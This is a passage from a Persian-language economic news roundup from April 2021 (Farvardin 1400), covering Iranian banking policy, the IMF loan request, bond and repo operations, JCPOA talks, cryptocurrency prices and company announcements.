وی در این نامه که به مدیران عامل بانک‌های ملی، سپه، مسکن، کشاورزی، ملت، تجارت، صادرات، رفاه، توسعه تعاون، پست بانک، صنعت و معدن و بانک توسعه صادرات ایران ابلاغ شده تاکید کرده که پرداخت نرخ‌های بالاتر از نرخ مصوب شورای پول و اعتبار جزو هزینه‌های مالیاتی قابل قبول نبوده و سازمان امور مالیاتی کشور موظف است مطابق گزارش سازمان حسابرسی در خصوص رعایت این موضوع اقدام به عمل آورد.

دژپسند در این نامه تاکید کرده است: با توجه به لزوم حمایت از تولید در راستای تحقق شعار سال «تولید، پشتیبانی‌ها و مانع‌زدایی‌ها» و پیرو تأکیدات قبلی، تمامی بانک‌ها موظف به رعایت دقیق نرخ‌های سود سپرده و تسهیلات مصوب شورای پول و اعتبار هستند.

 

۱۰ : صندوق بین‌المللی پول: هنوز در حال بررسی درخواست وام ۵ میلیارد دلاری ایران هستیم

مدیر بخش خاورمیانه و آسیای مرکزی صندوق بین المللی پول با اشاره به درخواست ایران از این صندوق برای دریافت وام ۵ میلیارد دلاری مقابله با کرونا گفت: صندوق بین المللی پول هنوز درحال بررسی این درخواست است.

مدیر بخش خاورمیانه و آسیای مرکزی صندوق بین المللی پول از بررسی درخواست وام ۵ میلیارد دلاری ایران در این نهاد بین المللی خبر داد.

جهاد آزور بدون اشاره به این که چرا پاسخ صندوق بین المللی پول به درخواست ایران برای دریافت وام ۵ میلیارد دلاری مقابله با کرونا طولانی شده است گفت: صندوق بین المللی پول هنوز درحال بررسی این درخواست است.

دولت آمریکا به عنوان سهامدار عمده صندوق بین المللی پول مانع تایید درخواست ایران در این نهاد به اصطلاح بین المللی شده است.

جهاد آزور همچنین گفت:«ما انتظار داریم اقتصاد ایران در سال جاری و سال آینده میلادی به رشد مثبت باز گردد».

این صندوق در اکتبر سال گذشته پیش‌بینی کرده بود اقتصاد ایران ۵ درصد در ۲۰۲۰ کوچک شود ولی بعد در گزارش دورنمای اقتصاد جهان که هفته گذشته منتشر شد، این رقم را به ۱٫۵ درصد رشد در ۲۰۲۰ و ۲٫۵ درصد رشد در ۲۰۲۱ تغییر داد.

صندوق بین‌المللی پول انتظار دارد تورم در ایران در سال جاری میلادی برابر با ۳۹ درصد باشد که بالاتر از ۳۶٫۵ درصد سال گذشته است.

وی گفت:«برای مقابله با تورم در ایران باید مسئله رژیم چند ارزی موجود در ایران حل شود که نه تنها به از بین بردن تورم کمک می‌کند، بلکه ثبات اقتصاد کلان را هم بهبود خواهد داد».

آزور گفت اصلاح بخش مالی و شرکت‌های دولتی باید در اولویت قرار بگیرد و فضای بیشتری به بخش خصوصی داده شود تا در اشتغال‌زایی کمک کند.

صندوق بین‌المللی پول تخمین می زند نرخ بیکاری در ایران در سال جاری تا ۱۱٫۲ درصد افزایش یابد. این رقم در ۲۰۲۰ برابر با ۱۰٫۸ درصد بود و پیش‌بینی می‌شود در سال آینده میلادی به ۱۱٫۷ درصد برسد.

 

۱۱ : وام ساخت مسکن ۳۰۰ میلیون تومان شد

عضو هیئت مدیره بانک مسکن از افزایش وام نوسازی بافت فرسوده برای سازندگان حرفه‌ای به ۳۰۰ میلیون تومان در تهران خبر داد.

محمدحسن علمداری با اشاره به پرداخت وام مسکن بافت فرسوده به ۲۰ هزار واحد،‌ اظهار کرد: مبلغ قرارداد امضا شده با مالکان بافت‌های فرسوده تاکنون ۱۳۷۰ میلیارد تومان است.

وی یادآور شد: سال ۹۹ برای احیای بافت‌های فرسوده با استفاده از روش‌های نوین ساخت و ساز ۲۵۰ میلیون تومان تسهیلات پرداخت می‌شد که امسال این وام به ۳۰۰ میلیون تومان افزایش یافته است.

وی افزود: بانک مسکن در تهران و کلانشهرها ۵۰ میلیون و در سایر شهرها ۴۰ میلیون تومان وام بافت فرسوده با سود ۹ درصد پرداخت می‌کند. عضو هیئت مدیره بانک مسکن گفت: مابقی تسهیلات موردنیاز برای بافت فرسوده با سود ۱۸ درصد به متقاضیان پرداخت می‌شود.

 

۱۲ : جزییات افزایش استقلال بانک مرکزی

محمد صفایی نماینده مردم گناباد و بجستان در مجلس شورای اسلامی، با اشاره به نام‌گذاری سال جدید به نام سال تولید، پشتیبانی‌ها و مانع‌زدایی‌ها از سوی مقام معظم رهبری گفت: کمیسیون اقتصادی در همین راستا طرح اصلاح نظام بانکی و طرح اصلاح نظام مالیاتی را در دستورکار خود دارد که طی یکی دو ماه آینده در کمیسیون بررسی و تصویب و برای رسیدگی در دستورکار صحن مجلس قرار خواهد گرفت.

وی افزود: از جمله مواردی که در طرح اصلاح نظام بانکی دیده شده،‌ استقلال بانک مرکزی از اعضای کابینه و از جمله وزیر امور اقتصادی و دارایی است.

عضو کمیسیون اقتصادی مجلس اظهار داشت: بر اساس طرح اصلاح نظام بانکی رئیس کل بانک مرکزی توسط رئیس جمهور عزل و نصب خواهد شد و مستقیما زیر نظر شخص رئیس جمهور خواهد بود و اعضای کابینه نمی‌توانند بر تصمیمات او تأثیر بگذارند.

صفایی خاطرنشان کرد: همچنین براساس این طرح از این پس عزل و نصب مدیران عامل بانک‌ها توسط رئیس کل بانک مرکزی انجام خواهد شد و رئیس کل بانک مرکزی درواقع مجری تصمیمات هیأت مرکزی بانک مرکزی است.

وی افزود: از دیگر مواردی که در طرح اصلاح نظام بانکی به آن توجه شده، توجه به بحث تولید و جلوگیری از سوداگری بانک‌هاست.

عضو کمیسیون اقتصادی مجلس اظهار داشت: در این طرح محدودیت‌ها و موانع زیادی بر سر راه سوداگری بانک‌ها گذاشته شده و تلاش می‌شود سرمایه‌ بانک‌ها بیش از گذشته به سمت تولید هدایت شود.

صفایی خاطرنشان کرد: در حال حاضر تنها ۲۰ درصد از سرمایه‌ بانک‌ها به بخش تولید تخصیص می‌یابد که مقدار کمی است و باید این میزان افزایش یابد.

 

۱۳ : چهار شرط بازگشت ایران به تعهدات برجامی

نائب رئیس کمیسیون اقتصادی مجلس معتقد است که در ازای محدودیت غنی سازی، باید ۴ اقدام اساسی در راستای رفع تحریم انجام شود.

احسان خاندوزی نائب رئیس کمیسیون اقتصادی مجلس نوشت، اگر طرفهای برجامی در مذاکرات تقاضاهای معین مانند ۳٫۶۷ درصد برای سقف غنی سازی داشته باشند در مقابل ما هم باید شرایط معین داشته باشیم.

۱٫تضمین صادرات ۲٫۳ میلیون بشکه نفت در روز

۲٫آزادسازی ۱۵ میلیارد دلار داراییهای خارجی مسدود شده ایران

۳٫معامله تا ۴ میلیارد دلار ماهانه در سویفت

۲ تا ۳ ماه برای راستی آزمایی  محقق شدن رفع تحریم

سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۲۶ فروردین ماه ۱۴۰۰

 

۱۴ : افزایش نرخ سود در سررسیدهای یک، دو و سه سال

حجم معاملات خرد اوراق بدهی دولتی در بازار ثانویه با ۹ درصد کاهش به ۱۹۱ میلیارد تومان رسید

بررسی منحنی بازده نزدیک شدن نرخها در سررسیدهای بالاتر از یکسال را نشان میدهد. البته منحنی بازده نسبت به روز گذسته با یک دهم درصد افزایش به سمت بالا منتقل شده است. نرخ بازده اوراق یک، دو و سه سال با یک دهم درصد افزایش به ترتیب به ۲۱٫۱۳، ۲۱٫۲۹ و ۲۱٫۳۵ درصد رسید. همانطور که مشخص است منحنی بازده سود ملایم صعودی دارد و با افزایش سررسید اوراق بازده آنها نیز افزایش می‌یابد.

امروز منحنی نرخ بازدهی اوراق آتی ونقدی نیز مانند چهار روز کاری اخیر  مسطح بود. منحنی آتی در این روز با محور ۲۱٫۵درصدی مماس بود.

نرخ بازده نقدی و آتی

در بازار اوراق بدهی دولتی، نرخ‌های بازده اوراق در سررسیدهای زمانی مختلف از طریق عرضه و تقاضا کشف می‌شود. نرخ کشف‌شده بر اساس این سازوکار متوسط بازده نقدی نگهداری اوراق تا سررسید را نشان می‌دهد. همچنین از تفاوت نرخ‌های بازده نقدی در سررسیدهای مختلف، می‌توان برای استخراج بازده آتی مورد انتظار سرمایه‌گذاران استفاده کرد.

 

۱۵ : تزریق ۴.۵ هزار میلیارد تومان اوراق به بانک‌ها در عملیات بازار باز

بانک مرکزی با تزریق ۴.۵ هزار میلیارد تومان نقدینگی در قالب توافق بازخرید با حداقل نرخ ۱۹.۸۰ درصد به بانک‌های متقاضی موافقت کرد.

پیرو اطلاعیه روز سه‌شنبه ۱۷ فروردین‌ماه ۱۴۰۰ مبنی بر برگزاری حراج خرید مدت‌دار اوراق بدهی دولتی در عملیات بازار باز، پنج بانک و مؤسسه اعتباری در مهلت تعیین شده سفارش فروش اوراق بدهی دولتی در قالب توافق بازخرید (ریپو) را در مجموع به ارزش ۱۱۷.۳ هزار میلیارد ریال از طریق سامانه بازار بین‌بانکی به بانک مرکزی ارسال کردند.

با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، موضع پولی بانک مرکزی در این هفته تزریق نقدینگی بود. از این رو، بانک مرکزی با تزریق ۴۵.۰ هزار میلیارد ریال نقدینگی در قالب توافق بازخرید با سررسید ۱۴ روزه با حداقل نرخ ۱۹.۸۰ درصد به بانک‌های متقاضی موافقت کرد. معاملات مربوط به این عملیات توسط کارگزاری بانک مرکزی در روز دوشنبه ۲۳ فروردین‌ماه انجام شد.

به علاوه، در هفته منتهی به ۲۳ فروردین، بانک‌ها و مؤسسات اعتباری در هفت نوبت از اعتبارگیری قاعده‌مند در مجموع به ارزش ۲۴۷ هزار میلیارد ریال استفاده کردند. همچنین در این دوره، مبلغ ۲۶۸.۵ هزار میلیارد ریال از ریپوی انجام شده در قالب اعتبارگیری قاعده‌مند سررسید شد. بانک‌ها و مؤسسات اعتباری غیربانکی می‌توانند در روزهای شنبه تا چهارشنبه از اعتبارگیری قاعده‌مند (دریافت اعتبار با وثیقه از بانک مرکزی) مشروط به در اختیار داشتن اوراق بدهی دولتی و در قالب توافق بازخرید با نرخ سود سقف دالان (۲۲ درصد) استفاده کنند.

همچنین در هفته منتهی به ۲۳ فروردین ۱.۴ هزار میلیارد ریال اوراق بدهی دولتی متعلق به بانک مرکزی توسط کارگزاری این بانک در بازار ثانویه فروخته شد.

بانک مرکزی در چارچوب مدیریت نقدینگی مورد نیاز بازار بین‌بانکی ریالی، عملیات بازار باز را به صورت هفتگی اجرا می‌کند. موضع این بانک (خرید یا فروش قطعی یا اعتباری اوراق بدهی دولتی) بر اساس پیش‌بینی وضعیت نقدینگی در بازار بین‌بانکی و با هدف کاهش نوسانات نرخ بازار بین‌بانکی حول نرخ هدف، از طریق انتشار اطلاعیه در سامانه بازار بین‌بانکی اعلام می‌شود.

متعاقب اطلاعیه مزبور، بانک‌ها و مؤسسات اعتباری غیربانکی می‌توانند در راستای مدیریت نقدینگی خود در بازار بین‌بانکی، نسبت به ارسال سفارش‌ها تا مهلت تعیین شده از طریق سامانه بازار بین‌بانکی اقدام کنند.

 

۱۶ : بیت کوین بر قله ۶۳ هزار دلاری ایستاد

ارزش بیت کوین برای نخستین بار از ۶۳ هزار دلار عبور کرد.

 نشانه هایی وجود دارد که فعالان بورس وال استریت بالاخره پس از حدود یک دهه از راه اندازی ارزهای دیجیتالی در حال قبول آن ها هستند. برای نخستین بار قرار است تا سهام صرافی ارزهای دیجیتالی کوین بیس در بورس وال استریت عرضه اولیه شود. ارزش اولیه سهام این صرافی چیزی در حدود ۱۰۰ میلیارد دلار برآورد می شود. دو بانک بزرگ آمریکایی گلد من ساکس و جی پی مورگان نیز اعلام کرده اند به زودی امکان دسترسی به ارزهای دیجیتالی را در اختیار مشتریانشان خواهند گذاشت.

بنا به گزارش ایسنا، یک بار دیگر مجموع ارزش بازار ارزهای دیجیتالی به چیزی در حدود دو تریلیون دلار رسیده که این به معنای ارزش بازاری معادل ارزش بازار شرکت اپل به عنوان دومین شرکت بزرگ در جهان است. از زمانی که بانک های مرکزی در نقاط مختلف اعلام کردند پروژه های خود برای راه اندازی ارزهای دیجیتالی را تسریع می بخشند، مقبولیت و محبوبیت ارزهای دیجیتالی بین معامله گران و شهروندان عادی افزایش یافته است.

در ادامه روند ورود شرکت های بزرگ به بازار ارزهای دیجیتالی، این بار نوبت به یکی از بزرگ ترین شرکت های چینی رسیده است. طبق اعلام مدیران شرکت میتو، این شرکت ۱۰۰ میلیون دلار در بیتکوین و اتریوم سرمایه گذاری خواهد کرد. این اقدام در راستای تنوع بخشی به دارایی های این شرکت در زمان همه گیری کرونا و کاهش آسیب پذیری به سبد دارایی های نقدی این شرکت انجام می شود.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۱۸۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۵.۶۷ درصد بیشتر شده است. در حال حاضر ۵۷ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۴ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۶۳ هزار و ۱۶۲.۴۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۴ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸.۶ درصد افزایش

 

۲- اتریوم

قیمت: ۲۲۹۰.۲۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۸۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸.۶۴ درصد افزایش

 

۳- بایننس کوین

قیمت: ۵۶۴.۲۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۵ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۴۳.۴۹ درصد افزایش

 

۴- ریپل

قیمت: ۱.۸۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳۳.۷۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸۳.۱۶ درصد افزایش

 

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۱۳ درصد کاهش

۶- کاردانو

قیمت: ۱.۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۹۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۹.۳ درصد کاهش

 

۷- پولکا دوت

قیمت: ۴۲.۳۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۷۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲.۰۴ درصد کاهش

 

۸- یونی سواپ

قیمت: ۳۵.۸۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۷۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵.۲۶ درصد کاهش

 

۹- لایت کوین

قیمت: ۲۷۱.۸۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۱.۲۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۴.۱۸ درصد افزایش

 

۱۰- استلار

قیمت: ۰.۶۸۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۴.۹۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۵.۰۱ درصد افزایش

 

۱۷ : تکلیف مجلس برای بانک مرکزی درباره سامانه صیاد

رئیس کمیسیون اصل ۹۰ مجلس گفت: مسئولان بانک مرکزی در این جلسه مکلف شدند تا برای تسهیل دسترسی مردم در نقاط مختلف کشور به سامانه صیاد، امکان ثبت، تایید و انتقال چک از مسیر خودپردازها(ATM) را فراهم آورند.

نصرالله پژمانفر رئیس کمیسیون اصل ۹۰ مجلس شورای اسلامی، درباره اقدامات این کمیسیون برای تسریع در روند اجرای قانون جدید چک گفت: اجرای قانون جدید چک بلافاصله بعد از تصویب و ابلاغ این قانون در سال ۹۷ شروع شد و در طول این دو سال، اجرای قانون جدید چک تاثیر مثبتی بر روی کاهش چک‌های برگشتی از نظر تعداد و ارزش گذاشته است.

وی خاطر نشان کرد: در قانون جدید چک، تکالیف دستگاه‌های مختلف مشخص و زمان بندی قانونی برای اجرایی شدن این تکالیف در نظر گرفته شده است که تاکنون برخی از این تکالیف کامل اجرا شده اما برخی از تکالیف هنوز به مرحله اجرای نرسیده است.

رئیس کمیسیون اصل ۹۰ مجلس با اشاره به اینکه اجرایی نشدن برخی از تکلیف موجب شد تا کمیسیون اصل ۹۰ مجلس به موضوع اجرای قانون جدید چک ورود کند و جلسات متعددی را با دستگاه‌های مختلف ترتیب دهد، گفت: یکی از اقداماتی که بانک مرکزی می‌بایست در آذر ۹۹ انجام می‌داد، ارائه چک‌های جدید صیادی به متقاضیان و الزامی کردن ثبت اطلاعات چک‌های جدید در سامانه صیاد بود که البته این اقدام به دلایلی در تاریخ مقرر اجرایی نشد.

وی ادامه داد: در نهایت بانک مرکزی آمادگی خود برای اجرای مرحله دیگری از قانون جدید چک از ابتدای سال ۱۴۰۰ را اعلام کرد و هم کانون مرحله جدیدی از قانون که شامل الزامی شدن ثبت چک های جدید در سامانه صیاد است در حال اجرا شدن است و بانک مرکزی باید با نظارت مضاعف نواقص احتمالی اجرای قانون را رفع کند.

پژمانفر با اشاره به یکی از آخرین جلسات کمیسیون اصل ۹۰ که با حضور مسئولان بانک مرکزی برای بررسی نحوه اجرای قانون جدید چک تشکیل شده بود، گفت: مسئولان بانک مرکزی در این جلسه مکلف شدند تا برای تسهیل دسترسی مردم در نقاط مختلف کشور به سامانه صیاد، امکان ثبت، تایید و انتقال چک از مسیر خودپردازها (ATM) را فراهم آورند تا به این ترتیب مردم در روستاها هم بتوانند به راحتی چک‌های خود را ثبت و تایید کنند.

رئیس کمیسیون اصل ۹۰ مجلس افزود: همچنین در آن جلسه مقرر شد تا بانک مرکزی زیرساخت‌های لازم برای اطلاع رسانی پیامکی به گیرندگان چک را فراهم کند تا از این به بعد در صورت ثبت اطلاعات برگه چک توسط صادرکننده یا انتقال آن، پیامکی برای اطلاع رسانی به گیرنده ارسال و از سواستفاده‌های احتمالی جلوگیری شود.

وی با اشاره به نقش بانک مرکزی در اطلاع رسانی اجرای این مرحله از قانون جدید چک گفت: یکی از نکاتی که در جلسه کمیسیون اصل ۹۰ مورد تاکید قرار گرفت، ضرورت اطلاع رسانی مناسب بانک مرکزی برای آحاد مختلف مردم بود البته در این زمینه بانک مرکزی اقدامات خوبی انجام داده است که لازم است به آن تداوم ببخشد.

پژمانفر در پایان تاکید کرد: امیدواریم با اجرای کامل قانون جدید چک میزان چک‌های برگشتی بیش از پیش کاهش پیدا کند و به این ترتیب اعتبار چک در مبادلات افزایش یابد که این موضوع قطعا به نفع فعالان اقتصادی خوش حساب خواهد بود.

 

۱۸ : حذف مرجعیت نیما در عرضه ارز صادراتی

طبق مصوبات جدید ستاد هماهنگی اقتصادی دولت و کمیته ماده دو و با هدف حمایت از تولید و صادرات ، شرکت های صادرکننده بورسی و غیر بورسی اجباری در فروش ارز به سامانه نیما ندارند.

مذاکرات وین به دلیل ابتلای یکی از اعضای هیات مذاکره کننده اروپایی به کرونا، با یک روز تاخیر، به روز پنج شنبه موکول شد.

اخبار کلان ۲۵ فروردین ۱۴۰۰

مهمترین رویدادها در ارتباط با تحولات برجامی دنبال می‌شود. نشست گفت‌وگوهای سیاسی میان معاونین وزرای امور خارجه ایران و اسلواکی (۲۴ فروردین ۱۴۰۰) به صورت ویدئو کنفرانس انجام شد. در این دیدار معاون سیاسی وزیر خارجه از تصمیم اخیر اتحادیه اروپا در اضافه کردن نام تعدادی از شخصیت‌های ایرانی به فهرست تحریم‌های اتحادیه گلایه کرده و گفت در واکنش به این اقدام ایران گفت‌وگوهای جامع خود با اتحادیه و همکاری در حوزه‌های تروریسم، موادمخدر و پناهندگان را به حالت تعلیق در می‌آورد. البته براساس برنامه قبلی قرار بود جلسه مذاکره با ۱+۴  فردا چهارشنبه برگزار شود اما بدلیل ابتلای یکی از اعضای هیئت سیاسی اتحادیه اروپا به کرونا و ضرورت رعایت پروتکل‌های مراقبتی، جلسه روز پنجشنبه برگزار می‌شود. همچنان دست ایران در مذاکرات از دید معاون وزیر امور خارجه گسترده‌تر و بازتر است.

البته پس از خرابکاری در تاسیسات هسته ای نطنز و پیرامون طرح قانونی مجلس، سخنگوی سازمان انرژی اتمی ایران از آغاز غنی سازی ۶۰ درصدی از امشب خبر داده و معاون وزیر خارجه ایران نیز گفته آن را به اطلاعات مقامات آژانس رسانده است. کاخ سفید نسبت به آغاز غنی سازی ۶۰ درصدی در تاسیسات هسته ای نطنز هشدار و ابراز نگرانی کرد. پیش‌تر هم گزارش ارزیابی تهدیدهای جهانی که توسط دفتر مدیر اطلاعات ملی آمریکا منتشر شده، تصریح دارد ایران در حال انجام فعالیت‌های کلیدی برای ساخت سلاح هسته‌ای نیست. سخنگوی وزارت امورخارجه آمریکا البته در میان ادامه درخواست ایران برای آزادی پول‌های مسدود شده تهران در بانک‌های کره جنوبی، با ارسال ایمیلی به خبرگزاری یونهاپ هم اعلام کرده موضع ایالات متحده در مورد تحریم‌های ایران تغییر نکرده است.

نماینده روسیه هم در رابطه با حادثه خرابکارانه در نطنز و آغاز فعالیت غنی سازی ۶۰ درصدی عنوان کرده که غنی سازی ۶۰ درصدی ایران در وین بررسی میشود. حسن روحانی، رئیس جمهور در گفت‌وگوی امشب خود با امیر قطر بر بازگشت به برجام در صورت رفع کامل تحریم ها از سوی امریکا نیز تاکید کرده است. خبرگزاری رسمی قطر پیش‌تر اعلام کرده بود رابرت مالی، نماینده ویژه رئیس جمهور آمریکا در امور ایران در تماس تلفنی با محمدعبدالرحمن آل ثانی، وزیر خارجه قطر درباره آخرین تحولات منطقه‌ای به ویژه مسئله ایران گفتگو کردند. سرگئی لاوروف، وزیر امور خارجه روسیه هم روز سه‌شنبه در دیدار با حسن روحانی هم گفته است مذاکرات درباره مسائل منطقه‌ای و نظامی باید خارج از چارچوب برجام و با حضور کشورهای منطقه به صورت جداگانه بررسی شود.

البته همچنان واکنش ها به حادثه نطنز ادامه دارد؛ علیرضا زاکانی، رئیس مرکز پژوهش‌های مجلس با تاکید اینکه ایران بهشت جواسیس است، گفته چندین هزار سانتریفیوژ در جریان حادثه نطنز از بین رفته است. امشب هم شبکه خبری المیادین گزارش داد یک کشتی اسرائیلی در نزدیکی سواحل امارات هدف قرار گرفته است. ایران پیش تر خرابکاری در تاسیسات هسته ای نطنز را تایید کرده بود. مقامات امنیت ملی و اطلاعاتی آمریکا و رژیم صهیونیستی روز سه شنبه دور دوم مذاکرات راهبردی را درباره ایران برگزار کردند که بر اساس گزارش پایگاه خبری اکسیوس مذاکرات وین نیز از محورهای این گفت‌وگوها خواهد بود. روزنامه جروزالم‌پست مدعی شده هدف از حمله نطنز جلوگیری از اعمال فشار از سوی ایران روی آمریکا در مذاکرات برای بازگشت واشنگتن به برجام بوده است.

بحث‌های مربوط به انتخابات ۱۴۰۰ هم کم کم در حال داغ شدن است و بسیاری را به واکنش واداشته است؛ درحالی که بسیاری از جریان ها گمانه زنی میکردند حسن خمینی نوه آیت‌اله خمینی به کارزار انتخابات بیاید که روز سه شنبه در گزارشی رسمی به نقل از یاسر خمینی (اخوی حسن خمینی) به دلیل نهی و توصیه رهبر انقلاب از ورود او در شرایط حاضر به انتخابات، به احتمال بسیار زیاد یادگار امام، نیامده از ورود به انتخابات، منصرف شده است. دیگر خبرها از انتخابات هم حکایت از این دارد که از ورود ابراهیم رئیسی، رئیس قوه قضاییه به انتخابات نیز نهی شده است. حالا باید در انتظار ماند که  چه افرادی برای ثبت نام به وزارت کشور میروند. هر چند که برخی افراد به صورت مستقل همچون علی مطهری، علی دهقان رسما ورودشان را به انتخابات اعلام کرده اند.

در سوی دیگر دولتی ها نسبت به وضعیت بازارها گزارش می‌دهند؛ عبدالناصر همتی، رئیس کل بانک مرکزی از آرامش نسبی بازار خبر داده و نسبت به تداوم مسیر مزبور در بازار ارز نیز ابراز اطمینان کرده است. علی ربیعی، سخنگوی دولت در گفت‌وگوی مطبوعاتی سه شنبه های خود در واکنش به اتهامات وارده به دولت درباره دخالت در بازار سهام تاکید کرد: بورس جایی نیست که دولت در آن کیسه ای دوخته باشد حمایت از بازار سرمایه فراموش نشده است، هیچکسی در بلند مدت در بورس زیان نکرده است نباید اعتماد را از این بازار از بین ببریم به زودی شاهد رونق بازار سرمایه هم خواهیم بود.

در پی مصوبه جلسه روز دوشنبه رئیس سازمان بورس با مدیران عامل هلدینگ ها و شرکت های سرمایه گذاری فعال در بازار سرمایه، تزریق حدود ۲۴ هزار میلیارد تومان به بازار سهام توسط شرکت های سرمایه گذاری و هلدینگ ها و با هدف انتشار اوراق برای خرید سهام به تصویب رسید و البته در جلسه امروز صبح مدیران بورسی، سازمان بورس در توضیحات تکمیلی اعلام کرد: در ساعت آینده موافقت اصولی به منظور انجام فرایند برای متقاضیان صادر می شود.  به منظور اطمینان از تخصیص منابع به خرید سهام  این ارقام به صورت تدریجی به بازار تزریق می شود.

درکنار اخبار و رویدادهای سیاسی و اقتصاد، همچنان قربانیان و مبتلایان کرونا در ایران در مرز بسیار خطرناکی قرار دارد و تعداد مبتلایان رکوردهای جدیدی را به جا می‌گذارد. مدیر عامل سازمان بهشت زهرا در یک گفت‌وگوی تاسفناک گفته است: متأسفانه شرایط خوبی حاکم نیست و در دو روز گذشته آمار جان باختگان کرونایی در تهران به عدد ۱۰۰ رسیده است.

اخبار صنایع ۲۵ فروردین ۱۴۰۰

مهمترین خبر امروز در صنایع، برای صادراتی ها بود که براساس آن اجبار به عرضه ارز در نیما لغو شد. طبق مصوبات جدید ستاد هماهنگی اقتصادی دولت و کمیته ماده دو و با هدف حمایت از تولید و صادرات ، شرکت های صادرکننده بورسی و غیر بورسی اجباری در فروش ارز به سامانه نیما ندارند و می‌توانند ارز حاصل از صادرات را از طریق فهرست ۱۰۰۰ گانه‌ وزارت صنعت برای واردات مورد نیاز شرکت یا دیگر واردکنندگان هزینه کنند. همچنین براساس مصوبه دولت که توسط جهانگیری به دستگاه‌های ذیربط ابلاغ شد، گمرک مجاز است تا زمان تصویب و ابلاغ سود بازرگانی حقوق ورودی بر مبنای قانون بودجه سال ۱۴۰۰ نسبت به اخذ حقوق ورودی، عوارض و مالیات بر ارزش افزوده کالاهای وارداتی بر مبنای ارز ۴۲۰۰ تومان اقدام کند.

تازه ترین گزارش شامخ (شاخص مدیران خرید) از وضعیت اقتصاد و صنعت در ماه پایانی سال حاوی مقداری امید و اندکی بیم نسبت به آتیه صنعت و اقتصاد است. تازه ترین ویرایش شاخص مدیران خرید که از سوی مرکز پژوهش‌های اتاق بازرگانی منتشر شده، نشان می‌دهد شامخ کل اقتصاد در اسفندماه به بالاترین رقم خود در ۱۸ ماه اخیر رسیده است. موردی‌که صراحتا از تداوم رونق اقتصادی در این ماه حکایت دارد.

اخبار شرکت ها ۲۵ فروردین ۱۴۰۰

گروه صنعتی ایران خودرو (خودرو) طرح پیش‌فروش چهار محصول پرُ متقاضی را از چهارشنبه ۲۵ فروردین ماه به مدت چهار روز به اجرا می‌گذارد. همچنین تعداد ۱٫۲ میلیون سهم معادل ۸۳ درصد سهام کنترلی شرکت کارخانجات نساجی بروجرد (نبروج۴) با قیمت پایه کل ۱٫۲ میلیارد تومان روز شنبه ۴ اردیبهشت از طریق بازار پایه فرابورس ایران عرضه میشود.

سایپا دیزل (خکاوه) هم در خبری اعلام کرد:  با توجه به پیگیریهای صورت پذیرفته و کاربرگ صادره توسط سازمان راهداری و حمل و نقل جاده ای به تعداد ۱۰۵۲ دستگاه یارانه صرفه جویی اسقاط خودروهای فرسوده جمعاً به مبلغ ۳٫۰۹۷٫۶۴۹٫۵۱ دلار که پس از کسر هزینه های کارمزد و سایر هزینه های مرتبط به موضوع یارانه در پایان سال مبلغ ۶۱۵٫۳۳۱ میلیون ریال به عنوان درآمد غیرعملیاتی در دفاتر ثبت گردیده است.  غلتک سازان سپاهان (فسازان) از خرید سه فقره زمین به همراه سوله خبر داد. این شرکت سه قطعه زمین به مساحت تقریبی ۱۷٫۲۰۰متر مربع به همراه ۴٫۰۰۰ متر مربع سوله وانشعابات آب و برق و گاز به ارزش ۲۴٫۶ میلیارد تومان خریداری کرد.

پتروشیمی جم (جم) برای نخستین بار در تاریخ تأسیس، رکورد تولید بیش از یک میلیون و ۲۲۰ هزار تن محصول در مجتمع الفین این شرکت را در سال گذشته ثبت کرد. پرونده شکایت پتروشیمی آبادان (شپترو) علیه شرکت ملی صنایع پتروشیمی در شعبه ۸۰ دادگاه عمومی حقوقی مجتمع قضایی شهید صدر تهران رسیدگی و رأی دادگاه به نفع  پتروشیمی آبادان صادر شد.

تولید خاک نسوز استقلال آباده (کباده) افزایش نرخ ۲۰ درصدی گرفت؛ با توجه به افزایش مجدد حقوق و دستمزد و همچنین افزایش نرخ پیمانکاران،هیئت مدیره تصمیم به افزایش نرخ خاک کرد.

در همین حال اوراق گواهی اعتبار مولد بانک صادرات ایران با سررسید تیرماه سال ۱۴۰۰ با نماد اگ۰۰۰۴۱۹ درج شد. نماد اوراق مذکور در روز شنبه ۲۸ فروردین در بورس اوراق بهادار تهران گشایش می یابد. دوره معاملاتی قراردادهای اختیار معامله خرید و فروش بر روی سهام فولاد خوزستان (فخوز) و گسترش نفت و گاز پارسیان (پارسان) در سررسید مهرماه ۱۴۰۰، از روز ‌یکشنبه ۲۹ فروردین در بازار مشتقه بورس اوراق بهادار تهران آغاز میشود.

۱۹ : آیا بانک مرکزی بزرگترین بدهکار دولت است؟

